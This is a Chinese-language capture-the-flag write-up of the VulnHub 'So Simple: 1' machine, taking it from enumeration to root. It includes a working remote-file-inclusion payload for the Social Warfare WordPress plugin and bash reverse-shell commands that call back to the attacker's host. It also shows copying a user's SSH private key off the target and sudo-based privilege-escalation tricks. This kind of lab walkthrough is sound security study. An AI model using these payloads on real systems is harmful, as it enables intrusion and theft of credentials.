So Simple
作者:jason_huawen
靶机基本信息
名称:So Simple: 1
地址:
https://www.vulnhub.com/entry/so-simple-1,515/
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ sudo netdiscover -i eth1Currently scanning: 192.168.63.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:9b:2a:62 1 60 PCS Systemtechnik GmbH
192.168.56.171 08:00:27:6d:04:47 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.171
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.171 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-13 22:04 EST
Nmap scan report for bogon (192.168.56.171)
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 5b:55:43:ef:af:d0:3d:0e:63:20:7a:f4:ac:41:6a:45 (RSA)
| 256 53:f5:23:1b:e9:aa:8f:41:e2:18:c6:05:50:07:d8:d4 (ECDSA)
|_ 256 55:b7:7b:7e:0b:f5:4d:1b:df:c3:5d:a1:d7:68:a9:6b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: So Simple
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:6D:04:47 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.18 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
获得Shell
访问80端口:
┌──(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ curl http://192.168.56.171
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>So Simple</title>
<body style="background-color:red;">
<img src="so-simple.png" alt="so simple" width="1900" height="790">
</body>
</head>
<!--- Hi, nothing obvious here at the bottom of the source-code, just look further :) --->
┌──(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ curl http://192.168.56.171/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 192.168.56.171 Port 80</address>
</body></html>
利用Gobuster工具扫描一下目标主机的80端口:
──(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ gobuster dir -u http://192.168.56.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.171
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/13 22:07:08 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.171/wordpress/]
/server-status (Status: 403) [Size: 279]
Progress: 218699 / 220561 (99.16%)===============================================================
2022/12/13 22:07:38 Finished
===============================================================
发现了wordpress站点,可利用wpscan工具扫描一下:
┌──(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ wpscan --url http://192.168.56.171/wordpress -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.171/wordpress/ [192.168.56.171]
[+] Started: Tue Dec 13 22:10:47 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.171/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.171/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.171/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.171/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.171/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://192.168.56.171/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.4
| Style URL: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.6 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6, Match: 'Version: 1.6'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] simple-cart-solution
| Location: http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/
| Last Updated: 2022-04-17T20:50:00.000Z
| [!] The version is out of date, the latest version is 1.0.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 0.2.0 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/assets/dist/js/public.js?ver=0.2.0
| Confirmed By:
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
[+] social-warfare
| Location: http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/
| Last Updated: 2021-07-20T16:09:00.000Z
| [!] The version is out of date, the latest version is 4.3.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Comment (Passive Detection)
|
| Version: 3.5.0 (100% confidence)
| Found By: Comment (Passive Detection)
| - http://192.168.56.171/wordpress/, Match: 'Social Warfare v3.5.0'
| Confirmed By:
| Query Parameter (Passive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.0
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.0
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.171/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] max
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Dec 13 22:10:51 2022
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 16.409 KB
[+] Data Received: 608.511 KB
[+] Memory used: 240.68 MB
[+] Elapsed time: 00:00:03
WPSCAN工具识别出2个用户名:admin, max, 以及插件:social-warfare(版本3.5.0)
先看下能否利用WPSCAN工具破解一下admin的密码:
┌──(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ wpscan --url http://192.168.56.171/wordpress -U admin -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
密码没有破解成功,然后查询一下插件social-warfare是有有漏洞可利用:
https://www.exploit-db.com/exploits/46794
有远程执行漏洞,先验证一下漏洞是否存在:
在Kali Linux本地编写一个poc文本文件,然后利用Python 启动web:
┌──(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ vim poc1.txt
┌──(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ cat poc1.txt
<pre>system('cat /etc/passwd')</pre>
然后访问下面的url:
http://192.168.56.171/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.56.206:8000/poc1.txt
利用浏览器访问上述url:
返回结果为:
oot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin max:x:1000:1000:roel:/home/max:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false mysql:x:112:118:MySQL Server,,,:/nonexistent:/bin/false steven:x:1001:1001:Steven,,,:/home/steven:/bin/bash
证明存在漏洞,看能否利用该漏洞返回shell
──(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ cat poc2.txt
<pre>system('bash -i >& /dev/tcp/192.168.56.206/5555 0>&1')</pre>
访问url:
http://192.168.56.171/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.56.206:8000/poc2.txt
但是没有得到反弹的shell
修改上述txt文件:
┌──(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ cp poc2.txt poc3.txt
┌──(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ vim poc3.txt
┌──(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ cat poc3.txt
<pre>system('bash -c "bash -i >& /dev/tcp/192.168.56.206/5555 0>&1"')</pre>
http://192.168.56.171/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.56.206:8000/poc3.txt
在Kali Linux成功得到目标主机反弹回来的shell:
┌──(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.171] 37700
bash: cannot set terminal process group (797): Inappropriate ioctl for device
bash: no job control in this shell
www-data@so-simple:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@so-simple:/var/www/html/wordpress/wp-admin$
在max用户家目录下发现了ssh 私钥,将其下载到Kali Linux本地:
www-data@so-simple:/home/max$ cd .ssh
cd .ssh
www-data@so-simple:/home/max/.ssh$ ls -alh
ls -alh
total 20K
drwxr-xr-x 2 max max 4.0K Jul 14 2020 .
drwxr-xr-x 7 max max 4.0K Jul 15 2020 ..
-rw-r--r-- 1 max max 568 Jul 14 2020 authorized_keys
-rwxr-xr-x 1 root root 2.6K Jul 14 2020 id_rsa
-rw-r--r-- 1 root root 568 Jul 14 2020 id_rsa.pub
www-data@so-simple:/home/max/.ssh$ which python
which python
www-data@so-simple:/home/max/.ssh$ which python3
which python3
/usr/bin/python3
www-data@so-simple:/home/max/.ssh$ python3 -m http.server
python3 -m http.server
┌──(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ wget http://192.168.56.171:8000/id_rsa
--2022-12-13 23:49:13-- http://192.168.56.171:8000/id_rsa
Connecting to 192.168.56.171:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2602 (2.5K) [application/octet-stream]
Saving to: ‘id_rsa’
id_rsa 100%[=====================================================>] 2.54K --.-KB/s in 0s
2022-12-13 23:49:13 (6.10 MB/s) - ‘id_rsa’ saved [2602/2602]
┌──(kali㉿kali)-[~/Vulnhub/So_simple]
└─$ ssh -i id_rsa [email protected]
The authenticity of host '192.168.56.171 (192.168.56.171)' can't be established.
ED25519 key fingerprint is SHA256:+ejHZkFq2lUl66K6hxgfr5b2MoCZzYE8v3yBV3/XseI.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.171' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Dec 14 04:50:20 UTC 2022
System load: 0.0 Processes: 133
Usage of /: 57.3% of 8.79GB Users logged in: 0
Memory usage: 30% IPv4 address for docker0: 172.17.0.1
Swap usage: 0% IPv4 address for enp0s3: 192.168.56.171
* "If you've been waiting for the perfect Kubernetes dev solution for
macOS, the wait is over. Learn how to install Microk8s on macOS."
https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/
47 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Jul 15 19:18:39 2020 from 192.168.1.7
max@so-simple:~$ id
uid=1000(max) gid=1000(max) groups=1000(max),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
max@so-simple:~$ ls -alh
total 52K
drwxr-xr-x 7 max max 4.0K Jul 15 2020 .
drwxr-xr-x 4 root root 4.0K Jul 12 2020 ..
-rw-r--r-- 1 max max 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 max max 3.8K Jul 12 2020 .bashrc
drwx------ 2 max max 4.0K Jul 12 2020 .cache
drwx------ 3 max max 4.0K Jul 12 2020 .gnupg
drwxrwxr-x 3 max max 4.0K Jul 12 2020 .local
-rw------- 1 max max 118 Jul 12 2020 .mysql_history
-rw-r--r-- 1 max max 807 Feb 25 2020 .profile
drwxr-xr-x 2 max max 4.0K Jul 14 2020 .ssh
-rw-r--r-- 1 max max 49 Jul 12 2020 personal.txt
drwxrwxr-x 3 max max 4.0K Jul 12 2020 this
-rwxr-x--- 1 max max 33 Jul 13 2020 user.txt
max@so-simple:~$ cat user.txt
073dafccfe902526cee753455ff1dbb0
max@so-simple:~$
提权
将Linpeas.sh脚本上传至目标主机的/tmp目录,修改权限,执行脚本,在脚本输出结果中下面的信息引起我们的注意:
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for max on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User max may run the following commands on so-simple:
(steven) NOPASSWD: /usr/sbin/service
可以利用service的命令得到steven的shell,查看GTFOBINS网站给出的方法执行:
max@so-simple:/tmp$ sudo -u steven /usr/sbin/service ../../bin/sh
$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)
$ cd /home
$ ls
max steven
$ cd steven
$ ls -alh
total 28K
drwxr-xr-x 3 steven steven 4.0K Jul 15 2020 .
drwxr-xr-x 4 root root 4.0K Jul 12 2020 ..
-rw-r--r-- 1 steven steven 220 Jul 12 2020 .bash_logout
-rw-r--r-- 1 steven steven 3.7K Jul 12 2020 .bashrc
drwxrwxr-x 3 steven steven 4.0K Jul 13 2020 .local
-rw-r--r-- 1 steven steven 807 Jul 12 2020 .profile
-rwxr-x--- 1 steven steven 33 Jul 13 2020 user2.txt
$ cat user2.txt
b662b31b7d8cb9f5cdc9c2010337f9b8
$
$ sudo -l
Matching Defaults entries for steven on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User steven may run the following commands on so-simple:
(root) NOPASSWD: /opt/tools/server-health.sh
$ ls -alh /opt/tools/server-health.sh
ls: cannot access '/opt/tools/server-health.sh': No such file or directory
发现可以利用server-health.sh脚本进行提权,但是该脚本目前不存在,我们追加反弹脚本
提权
创建目录tools, 然后用nano编辑shell脚本:
steven@so-simple:/opt/tools$ cat /opt/tools/server-health.sh
#!/bin/bash
bash
注意需要增加执行权限,否则会报错:
steven@so-simple:/opt/tools$ sudo -u root /opt/tools/server-health.sh
sudo: /opt/tools/server-health.sh: command not found
steven@so-simple:/opt/tools$ chmod +x server-health.sh
steven@so-simple:/opt/tools$ sudo /opt/tools/server-health.sh
root@so-simple:/opt/tools# cd /root
root@so-simple:~# ls -alh
total 40K
drwx------ 5 root root 4.0K Jul 15 2020 .
drwxr-xr-x 20 root root 4.0K Jul 12 2020 ..
-rw-r--r-- 1 root root 3.1K Jul 15 2020 .bashrc
drwx------ 2 root root 4.0K Jul 12 2020 .cache
-rw------- 1 root root 28 Jul 15 2020 .lesshst
drwxr-xr-x 3 root root 4.0K Jul 12 2020 .local
-rw------- 1 root root 282 Jul 14 2020 .mysql_history
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 3.7K Jul 12 2020 flag.txt
drwxr-xr-x 4 root root 4.0K Jul 12 2020 snap
root@so-simple:~# cat flag.txt
/$$$$$$ /$$ /$$
/$$__ $$ | $$ | $$
| $$ \__/ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$$$| $$
| $$ /$$__ $$| $$__ $$ /$$__ $$ /$$__ $$|____ $$|_ $$_/ |____ /$$/| $$
| $$ | $$ \ $$| $$ \ $$| $$ \ $$| $$ \__/ /$$$$$$$ | $$ /$$$$/ |__/
| $$ $$| $$ | $$| $$ | $$| $$ | $$| $$ /$$__ $$ | $$ /$$ /$$__/
| $$$$$$/| $$$$$$/| $$ | $$| $$$$$$$| $$ | $$$$$$$ | $$$$//$$$$$$$$ /$$
\______/ \______/ |__/ |__/ \____ $$|__/ \_______/ \___/ |________/|__/
/$$ \ $$
| $$$$$$/
\______/
/$$ /$$ /$$ /$$
| $$ /$$/ | $/ | $$
\ $$ /$$//$$$$$$ /$$ /$$|_//$$ /$$ /$$$$$$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$ /$$$$$$ /$$$$$$$
\ $$$$//$$__ $$| $$ | $$ | $$ /$$//$$__ $$ /$$__ $$| $$ | $$ | $$| $$__ $$ /$$__ $$ /$$__ $$
\ $$/| $$ \ $$| $$ | $$ \ $$/$$/| $$$$$$$$ | $$ \ $$| $$ | $$ | $$| $$ \ $$| $$$$$$$$| $$ | $$
| $$ | $$ | $$| $$ | $$ \ $$$/ | $$_____/ | $$ | $$| $$ | $$ | $$| $$ | $$| $$_____/| $$ | $$
| $$ | $$$$$$/| $$$$$$/ \ $/ | $$$$$$$ | $$$$$$$/| $$$$$/$$$$/| $$ | $$| $$$$$$$| $$$$$$$
|__/ \______/ \______/ \_/ \_______/ | $$____/ \_____/\___/ |__/ |__/ \_______/ \_______/
| $$
/$$ /$$$$$$ /$$$$$$ /$$ | $$ /$$ /$$
| $//$$__ $$ /$$__ $$|__/ |__/ | $$ | $/
|_/| $$ \__/ /$$$$$$ | $$ \__/ /$$ /$$$$$$/$$$$ /$$$$$$ | $$ /$$$$$$|_/
| $$$$$$ /$$__ $$ | $$$$$$ | $$| $$_ $$_ $$ /$$__ $$| $$ /$$__ $$
\____ $$| $$ \ $$ \____ $$| $$| $$ \ $$ \ $$| $$ \ $$| $$| $$$$$$$$
/$$ \ $$| $$ | $$ /$$ \ $$| $$| $$ | $$ | $$| $$ | $$| $$| $$_____/
| $$$$$$/| $$$$$$/ | $$$$$$/| $$| $$ | $$ | $$| $$$$$$$/| $$| $$$$$$$
\______/ \______/ \______/ |__/|__/ |__/ |__/| $$____/ |__/ \_______/
| $$
| $$
|__/
Easy box right? Hope you've had fun! Show me the flag on Twitter @roelvb79
root@so-simple:~#
经验教训
-
要养成良好习惯,在编辑形成shell脚本后需要增加执行权限,否则必须用bash或者sh解释器执行;
-
在写反弹shell命令时,可能cheatsheet本身的方式是不够的,比如本靶机用bash -i是得不到shell的, 而需要bash -c 'bash -i xxxxxxxxx'